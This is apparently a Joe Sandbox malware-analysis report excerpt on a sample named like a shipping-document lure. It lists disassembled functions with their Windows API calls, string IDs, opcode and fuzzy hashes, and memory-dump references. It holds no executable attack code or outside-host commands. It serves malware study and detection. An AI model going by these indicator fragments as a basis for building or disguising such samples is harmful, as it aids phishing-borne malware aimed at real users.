                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                        • String ID: *.*
                        • API String ID: 1153243558-438819550
                        • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                        • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                        • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                        • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                        Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __wcsicoll
                        • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                        • API String ID: 3832890014-4202584635
                        • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                        • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                        • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                        • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                        Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                        • GetFocus.USER32 ref: 0046A0DD
                        • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessagePost$CtrlFocus
                        • String ID: 0
                        • API String ID: 1534620443-4108050209
                        • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                        • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                        • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                        • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                        Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(?), ref: 004558E3
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$CreateDestroy
                        • String ID: ,$tooltips_class32
                        • API String ID: 1109047481-3856767331
                        • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                        • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                        • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                        • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                        Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                        • GetMenuItemCount.USER32(?), ref: 00468C45
                        • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                        • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                        • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                        • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                        • GetMenuItemCount.USER32 ref: 00468CFD
                        • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                        • GetCursorPos.USER32(?), ref: 00468D3F
                        • SetForegroundWindow.USER32(?), ref: 00468D49
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                        • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                        • String ID: 0
                        • API String ID: 1441871840-4108050209
                        • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                        • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                        • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                        • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                        Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                        • __swprintf.LIBCMT ref: 00460915
                        • __swprintf.LIBCMT ref: 0046092D
                        • _wprintf.LIBCMT ref: 004609E1
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                        • API String ID: 3631882475-2268648507
                        • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                        • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                        • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                        • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                        Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                        Download Yara Rule
                        APIs
                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                        • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                        • SendMessageW.USER32 ref: 00471740
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                        • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                        • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                        • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                        • SendMessageW.USER32 ref: 0047184F
                        • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                        • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                        • String ID:
                        • API String ID: 4116747274-0
                        • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                        • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                        • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                        • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                        Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                        • _wcslen.LIBCMT ref: 00461683
                        • __swprintf.LIBCMT ref: 00461721
                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                        • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                        • GetDlgCtrlID.USER32(?), ref: 00461869
                        • GetWindowRect.USER32(?,?), ref: 004618A4
                        • GetParent.USER32(?), ref: 004618C3
                        • ScreenToClient.USER32(00000000), ref: 004618CA
                        • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                        • String ID: %s%u
                        • API String ID: 1899580136-679674701
                        • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                        • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                        • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                        • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                        Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                        • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                        • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: InfoItemMenu$Sleep
                        • String ID: 0
                        • API String ID: 1196289194-4108050209
                        • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                        • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                        • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                        • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                        Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetDC.USER32(00000000), ref: 0043143E
                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                        • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                        • SelectObject.GDI32(00000000,?), ref: 00431466
                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                        • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                        • String ID: (
                        • API String ID: 3300687185-3887548279
                        • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                        • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                        • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                        • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                        Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                        • GetDriveTypeW.KERNEL32 ref: 0045DB32
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                        • API String ID: 1976180769-4113822522
                        • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                        • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                        • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                        • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                        Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                        • String ID:
                        • API String ID: 461458858-0
                        • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                        • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                        • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                        • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                        Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                        • GlobalLock.KERNEL32(00000000), ref: 004300F6
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                        • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                        • CloseHandle.KERNEL32(00000000), ref: 00430113
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                        • GlobalFree.KERNEL32(00000000), ref: 00430150
                        • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                        • DeleteObject.GDI32(?), ref: 004301D0
                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                        • String ID:
                        • API String ID: 3969911579-0
                        • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                        • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                        • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                        • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                        Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
